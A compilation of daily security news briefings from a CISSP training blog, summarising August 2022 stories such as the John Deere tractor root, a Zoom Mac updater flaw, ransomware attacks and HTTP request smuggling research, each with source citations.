Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.
Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Signal Users' Number Compromised By Twilio Breach
The Twilio breach a couple of weeks ago revealed the phone numbers of 1,900 Signal users, according to an advisory published by Signal. The Signal encrypted messaging app uses Twilio for phone number verification, and this is how the numbers were leaked. However, message history, contact lists, profile information and other data were not compromised.
Signal is contacting the affected users and prompting them to re-register the Signal app - this is necessary because it was possible for the attackers to register these phone numbers to another device using an SMS verification code revealed by the breach.
Uncredited, Twilio Incident: What Signal Users Need to Know, Signal Support, August 2022. Available online at https://support.signal.org/hc/en-us/articles/4850133017242.
Zoom Update Vulnerability Exposes Mac Users
A nasty vulnerability in the automatic update feature of the Zoom videoconferencing app for Mac OS could grant attackers root access, security researcher Patrick Wardle revealed at DefCon on Saturday. Although initial installation of Zoom prompts for the user password, subsequent updates do not, because the updater runs as root. By feeding it a package with the right name, an attacker could either downgrade the zoom version or even install a trojan, earning the vuln a CVSS score of 8.8.
This is the most recent of a long series of vulnerabilities in Zoom; the company has released a patch which fixes this vulnerability but users really should not rely on the auto-update process to install it.
Purdy, Kevin, Update Zoom for Mac now to avoid root-access vulnerability, Ars Technica, 16 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/.
Zoom Security Bulletin ZSB-22018, Local Privilege Escalation in Zoom Client for Meetings for macOS, Zoom Inc., 13 August 2022. Available online at https://explore.zoom.us/en/trust/security/security-bulletin/.
Credential Theft Still Popular - Especially Callback Phishing
A new report from Ponemon Institute says that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks, backing similar results in the Verizon Data Breach Investigations Report. One leading cause: almost 60% of organizations do not revoke credentials once they are no longer needed, and these unused and unmonitored accounts are easy prey for attackers.
But as user awareness is improving resistance to simple phishing attacks, spear-phishers are increasing their use of hybrid techniques such as barrel-phishing and callback phishing. A report from Agari claims that while phishing attacks have increased by only 6% since Q1 2021, callback phishing has increased by 625%.
Toulas, Bill, Callback phishing attacks see massive 625% growth since Q1 2021, Bleeping Computer, 15 August 2022. Available online at https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-see-massive-625-percent-growth-since-q1-2021/.
Uncredited, Credential Theft Is (Still) A Top Attack Method, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html.
Uncredited, The State of Cybersecurity and Third-Party Remote Access Risk, SecureLink (sponsor), August 2022. Available online at https://www.securelink.com/research-reports/the-state-of-cybersecurity-and-third-party-remote-access-risk/ (registration required).
Android Banking Trojan Expands Capabilities and Reach
The SOVA (Russian for owl) banking trojan, which first appeared in September 2021, has continued to develop. The trojan uses the Accessibility Services feature of Android to overlay its own form fields over banking and shopping apps, and in its latest incarnation, SOVA v4, is able to intercept two-factor authentication codes and steal cookies. The operators have also expanded its targets from Spain and the US, where it was first seen, to Australia, Brazil, China, India, the Philippines and the UK.
Lakshamanan, Ravie, SOVA Android Banking Trojan Returns With New Capabilities and Targets, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Microsoft Finally Reverses Advice on DogWalk
This story has been emerging for some time. Despite first claiming that the DogWalk vulnerability was not a security issue, Microsoft has now issued a patch for CVE-2022-34713 and is advising customers to install it as soon as possible. The patch was part of last week's Patch Tuesday (Wednesday in the Antipodes) update, so many users on an auto-update policy will already have installed it, but enterprise users may not yet have patched Windows Server systems.
The RCE vulnerability allows attackers to exploit the Microsoft Support Diagnostic Tool via either social engineering or phishing and has been known since January 2020, so this has been quite a long delay on Microsoft's part.
Trueman, Charlotte, Microsoft urges Windows users to run patch for DogWalk zero-day exploit, ComputerWorld, 11 August 2022. Available at https://www.computerworld.com/article/3669434/microsoft-urges-windows-users-to-run-patch-for-dogwalk-zero-day-exploit.html.
Massive Ransomware Outage Hit UK NHS
A service provider to the UK's National Health Service has been hit by a targeted ransomware attack, shutting down or slowing access to patient records, the 111 telephone advice service and the out-of-hours appointment booking system for general practices. Some urgent treatment centres and mental health providers have also been affected.
At the time of writing, the National Cyber Security Centre and the Information Commissioner's Office are both working to investigate the attack on service provider Advanced, but have not identified who is behind the attack. Idle speculation suggests that it could be any of several groups who have spun off from the Conti gang, but there are many others who have specialised in healthcare attacks, including BlackCat, Quantum, Hive and AvosLocker.
Full restoration of services could take some weeks, as data must be restored, systems reconfigured and updated, additional controls possibly installed, and the remediation plans approved by NHS Digital. The repercussions are likely to continue for even longer, as patient data may well have been exfiltrated.
36 different healthcare trusts use Advanced's services; while the NHS is able to achieve economies of scale through this kind of arrangement, this breach illustrates the danger of putting so many eggs in one basket.
Milmo, Dan and Denis Campbell, Fears for patient data after ransomware attack on NHS software supplier, The Guardian, 11 August 2022. Available online at https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier.
9,000 Machines Online With No Passwords
VNC (virtual network computing) is a popular cross-platform software tool for providing graphical remote access for system installation, configuration and management - it is used to install SuSE Linux Enterprise Server on IBM zSeries mainframes, for example and is a popular alternative to SSH'ing to the command line for novice Linux system administrators.
Now security researchers at Cyble have discovered over 9,000 VNC endpoints which are not secured with a password, including SCADA and ICS systems such as water treatment plants, which could allow an attacker to remotely control pumps, causing all kinds of problems. While the systems are found all over the world, the majority are found in Sweden (perhaps unsurprising considering its size) with Sweden not far behind (surprising considering its size).
Toulas, Bill, Over 9,000 VNC servers exposed online without a password, Bleeping Computer, 14 August 2022. Available online at https://www.bleepingcomputer.com/news/security/over-9-000-vnc-servers-exposed-online-without-a-password/.
Want to Program? Go Python
The August edition of the TIOBE Index, which charts the popularity of different programming languages, shows that Python has now definitively passed long-time leaders C and Java. Although C and C++ did gain popularity, primarily for systems programming where performance is the key criterion in language selection, the all-round capability of Python will probably see it retain the top spot for some time to come.
Because Python features a REPL (Read, Evaluate, Print, Loop) interface which allows interactive execution, it is quite easy to learn its basic features. However, it can also compile its code for efficiency, and so the language is used in everything from small Raspberry Pi-based embedded systems through scripting applications for systems administration and reporting to scientific computing, data analysis and machine learning.
If asked to recommend which language security professionals should pick up for occasional use, the answer would have to be Python.
Other security-related language movements include the continued growth of safe systems-programming language Rust and the first appearance of Google's new C-derived language, Carbon.
Uncredited, TIOBE Index for August 2022: Python going through the roof, TIOBE (The Importance of Being Earnest), August 2022. Available online at https://www.tiobe.com/tiobe-index/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Companies Profit from Stolen Code
Macintosh malware researcher Patrick Wardle has found his code, released as open source, in a number of commercial products. As exhibit one, he cites a software tool he created back in 2016, called Oversight. The program monitors a Mac's microphone and webcam, to see whether any applications are accessing them without the knowledge of the owner (no surprise: a number were).
Several years later, Wardle was surprised to discover a number of commercial applications that were not only doing the same thing as Oversight, and in a similar way - they also contained the same bugs. When he approached the three companies involved, they all acknowledge that his code had been used without his consent, and they all eventually paid for rights.
Although it is likely that employees used the code without their employers' knowledge, it does bring to light a risk we sometimes overlook, and emphasizes the need to educate developers on free and open source software licensing.
Faife, Corin, This Mac hacker's code is so good, corporations keep stealing it, The Verge, 11 August 2022. Available online at https://www.theverge.com/2022/8/11/23301130/patrick-wardle-mac-code-corporations-stealing-black-hat.
Meta's In-App Browsers Inject Code to Track You Outside Facebook
Security researcher Felix Krause has investigated the behaviour of the Facebook and Instagram app browser component, and discovered that the app could track every interaction with external websites view from within it. The app injects JavaScript code into every website it renders - the code doesn't currently track everything, but it could monitor every button clicked, every link, all text selections and even form inputs, including passwords.
Now, I was pretty sure that I'd set an option in the Facebook app for Android to turn off the in-app browser, and use the Chrome browser instead - but looking for it now, any such setting seems to be quite deeply buried. So I, for one, welcome our new surveillance capitalism overlords.
Krause, Felix, iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser, Felix Krause blog, 10 August 2022. Available online at https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser.
Signed Secure UEFI Boot Loaders Not Trustworthy
The whole point of the Secure Boot process is to preserve a chain of trust that starts with the system's TPM chip and ends with a guaranteed-unmodified operating system. However, it turns out that three hardware vendors were somehow shipping UEFI boot loaders, signed by Microsoft, which were willing to bypass the process and execute arbitrary, unsigned, code. This would be the perfect way to install a rootkit, for example.
Fortunately, Microsoft's Patchday, earlier this week, saw updates shipped which fix the problem.
Lakshamanan, Ravie, Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders, The Hacker News, 12 March 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html.
GitHub Proposes Adoption of SigStore for NPM
As more and more software distributors adopted cryptographic signing of the packages they distribute, GitHub has asked developers to comment on a proposal to adopt Sigstore for the Node Package Manager (npm) which distributes pJavaScript packages for node.js and related systems. SigStore is an open-souce project which operates public-key infrastructure to both sign packages and to verify signatures, something that is seen as essential to the integrity of the software supply chain.
Lemos, Robert, Software Supply Chain Chalks Up a Security Win With New Crypto Effort, Dark Reading, 13 August 2022. Available online at https://www.darkreading.com/application-security/software-supply-chain-chalks-up-security-win-with-crypto-effort.
Chinese Threat Actor Targets Linux, Mac IM Application
Chinese group APT 27, variously known as Iron Tiger, Emissary Panda and LuckyMouse), is alleged to have deployed a JavaScript trojan in a popular instant messaging app called "MiMi". The backdoor first identifies the OS platform of the victim system, then downloads a back door called rshell. This then exfiltrates system information to its C2 server and awaits commands to search for and upload files to the server.
Older versions of the trojanized "MiMi" app also targeted Windows systems. The campaign appears to be targeting Chinese expatriates, perhaps to monitor their activities in other countries. The same threat actor has previously conducted cyberespionage campaigns internationally, attacking defence, healthcare, energy and technology enterprises. They were among several groups exploiting the Microsoft Exchange ProxyLogon vulnerability last year.
Gatlan, Sergiu, Chinese hackers backdoor chat app with new Linux, macOS malware, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/chinese-hackers-backdoor-chat-app-with-new-linux-macos-malware/.
NSFW Section (It's Saturday)
Excremental Retribution Exposed
A web service which sent a box of animal faeces, along with personalised message, to enemies of their customers (because surely nobody would do this to their friends?) has been exploited by a customer who discovered an SQL injection vulnerability and downloaded the service's entire database.
Unfortunately for ShitExpress (I couldn't avoid saying it in the end), this customer was pompompurin, the owner of the Breached.co forum - exactly the kind of person who would spot a vulnerability - who was planning to use the service to send some dung to a rival security researcher. Instead, he shared the contents of the database on the forum, revealing the motherlode of abusive messages.
The moral of the story: shit doesn't just happen.
Sharma, Ax, Anonymous poop gifting site hacked, customers exposed, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/anonymous-poop-gifting-site-hacked-customers-exposed/.
And that's it for this week!
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Facebook Draws Ire of Privacy and Freedom of Choice Advocates
Facebook is being criticized for surrendering the private messages of a teenager and her mother who were planning to use (and did use) a pharmaceutical product to terminate a pregnancy. The teenager, her mother and a man who assisted with disposal of the fetus have been charged with a number of offences, following investigations by police in Madison County, Nebraska, who had obtained a warrant requiring disclosure of the contents of an electronic communication.
Police subsequently seized the girl's phone and computer and retrieved the body of the fetus, which had been stillborn. The circumstances of the case are not as clear-cut as pro-choice advocates might like - the abortion was performed at 28 weeks gestation, which could be a crime prior to the contentious recent changes brought about by the US Supreme Court - but it does illustrate the way in which more recent cases will be prosecuted, with the cooperation of tech service providers.
The problem here is not Facebook; no US-based company, or company that operates in the US, be it a social media company, an email service provider, a messaging company or a telco, has the power to resist a warrant or court order issued by a US court. Those who seek privacy protections are going to have to use international service providers and also make use of encryption.
Koebler, Jason and Anna Merlan, This Is the Data Facebook Gave Police to Prosecute a Teenager for Abortion, Vice Motherboard, 9 August 2022. Available online at https://www.vice.com/amp/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion.
Snort Rule Snafu Snookers Office 365
A Snort rule update pushed to Cisco Meraki firewalls accidentally blocked access to Microsoft Office 365. The Snort rule, 1-60381, is commented, "Microsoft Windows IIS denial-of-service attempt" and blocked a number of IP addresses belonging to Microsoft. Disabling the rule restored access, and Cisco has now pushed out an update.
What can we say, but: measure twice and cut once.
GiacomoS, [RESOLVED] Microsoft vulnerability and IPS/SNORT, Meraki Community forum, 11 August 2022. Available online at https://community.meraki.com/t5/Meraki-Service-Notices/RESOLVED-Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649.
Microsoft 365 Status, We're working with our firewall partners to investigate snort rule 1-60381, Twitter thread, 11 August 2022. Available online at https://twitter.com/MSFT365Status/status/1557435310874587136.
SIM Box Used to Blast Smishes
The Australian Federal Police arrested two men who had allegedly used a SIM box to send out hundreds of thousands of SMS phishing messages which linked to fake bank and telco sites in order to capture the victims credentials. The AFP allege the pair had been targeting customers of the Commonwealth Bank of Australia, National Australia Bank and Telstra since 2018.
A SIIM box can hold hundred of SIM cards and can send hundreds of thousands of SMS messages per day.
Noyes, Jenny, Phishing fraudsters used SIM box to fleece hundreds of victims, police allege, Sydney Morning Herald, 11 August 2022. Available online at https://www.smh.com.au/national/nsw/phishing-fraudsters-used-sim-box-to-fleece-hundreds-of-victims-police-allege-20220811-p5b8xv.html.
Ethical Question: Should We Build Quantum Computers?
Quantum physicist Emma McKay, a PhD student at McGill University, is concerned about how people practice science and develop technology. In an interview with the American Physical Society, she expresses the controversial view that perhaps we should not build quantum computers at all. McKay points out that one of the main applications of quantum computers is the optimization of financial market trades - essentially, making the rich richer. Then there are the possible military applications of quantum computers.
On the other hand, quantum annealing - the type of quantum computer currently sold by Canadian company D-Wave - might have wide application in optimization problems. But, says McKay, this might simply be used to optimize traffic flows for single-occupant vehicles, when a better approach from an environmental and economic point of view might be to promote public transport as well as bicycling infrastructure.
Do you remember the Ten Commandments of the Computer Professionals for Social Responsibility? The 9th Commandment says, "Thou shalt think about the social consequences of the program you are writing or the system you are designing". And then remember Shakespeare: it is "more honoured in the breach than in the observance". A timely reminder.
Chen, Sophia, Should We Build Quantum Computers at All?, American Physical Society News, 8 August 2022. Available online at https://www.aps.org/publications/apsnews/202209/build-quantum.cfm.
Ransomware Gang More Trouble Than Ever
The remnants of the Conti ransomware gang have continued to cause more trouble for enterprises all over the world. Several groups have spun off and are operating independently, using the BazarCall tactic pioneered by Conti to gain access to victims' networks.
BazarCall, also known as call-back phishing, starts with an email telling the recipient that a subscription is about to renew, but the payment can be cancelled by calling a particular number. The number is answered by a social engineer, who convinces the caller to start a remote access session, which will be used by a network intruder to scout the network defences and deploy tools which will not be detected.
At least three groups - called Silent Ransom Group, Quantum and Roy/Zeon - are using this technique, which allows them to defeat sophisticated automated defences.
So damaging have these attacks become that the US State Department is offering a $US10 million reward for information on five of the ransomware gang members. Posting a photo of the hacker known as 'Target', the State Department is asking for information about him and four other members known as 'Tramp', 'Dandis', 'Professor' and 'Reshaev' - the information to be provided via a Tor anonymizing network link.
The success of the BazarCall technique's social engineering carries a message: we cannot pin all our hopes on technical controls; when the human becomes the weakest link, we must ramp up our efforts in security education, training and awareness.
Abrams, Lawrence, US govt will pay you $10 million for info on Conti ransomware members, Bleeping Computer, 11 August 2022. Available online at https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/.
Ilascu, Ionut, Conti extortion gangs behind surge of BazarCall phishing attacks, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/conti-extortion-gangs-behind-surge-of-bazarcall-phishing-attacks/.
HTTP Request Smuggling Attacks
In a paper released via a Black Hat talk today, PostSwigger Director of Research James Kettle has expanded his previous work on attacks against web servers to show how the same techniques can be used to exploit vulnerabilities in the HTTP/2 request handling of browsers.
The techniques utilized are somewhat too involved to detail here, and rely on interactions between the HTTP/1.1 and /2 and TCP protocols, along with the behaviour of reverse proxies and web content accelerators. For those interested, there's lots of good reading in the references below, while for everyone else, expect updates to popular web server software and browsers as the Bad Guys enjoy reading the same references and develop related exploits.
Kettle, James, Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling, white paper, 10 August 2022. Available online at https://portswigger.net/research/browser-powered-desync-attacks.
Vijayan, Jai, New HTTP Request Smuggling Attacks Target Web Browser, Dark Reading, 11 August 2022. Available online at https://www.darkreading.com/application-security/researcher-at-black-hat-describes-new-htpp-request-smuggling-attack.
Open Source Threat Intelligence - Not As Open As You'd Think
An article by three security researchers from Samsung Research in IEEE Security & Privacy points out that we should be wary of licensing conditions on open-source threat intelligence feeds. In many cases, the information is provided for personal, informational and research purposes only, and in some cases, the site or feed has no licence information or terms of service at all - in which case, no-one can use, copy, modify or distribute the information. In other cases, the meaning of terms like commercial use is unclear, making use risky.
Shim, WooChul, Hyejin Shin and Yong Ho Hwang, On Data Licenses for Open Source Threat Intelligence, IEEE Security & Privacy, Vol 20 No. 4, July/August 2022, pp. 8 - 22. Digital Object Identifier 10.1109/MSEC.2021.3127218.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.